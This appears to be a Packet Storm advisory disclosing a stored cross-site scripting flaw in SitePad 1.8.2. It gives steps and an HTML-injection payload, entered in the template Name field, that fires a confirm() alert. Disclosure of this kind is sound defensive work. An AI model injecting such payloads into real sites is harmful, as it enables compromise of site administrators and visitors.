SitePad version 1.8.2 suffers from a persistent cross site scripting vulnerability.
48e6c1331a13411ebde677abf495089e3693574074e2831d427d7943a6dded2a# Exploit Title: SitePad Version : 1.8.2 - Stored XSS
# Date: 2024-21-02
# Exploit Author: tmrswrr
# Vendor Homepage: https://sitepad.com/
# Version : 1.8.2
# Tested on: https://www.softaculous.com/apps/blogs/SitePad
1 ) Go to Templates > Header > Edit Pagelayer Template
2 ) Write in Name : "><img src=x onerrora=confirm() onerror=confirm(1)>
3) After save and refresh page will be see alert button https://127.0.0.1/SitePad/site-admin/admin.php?page=pagelayer_template_wizard&post=9
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed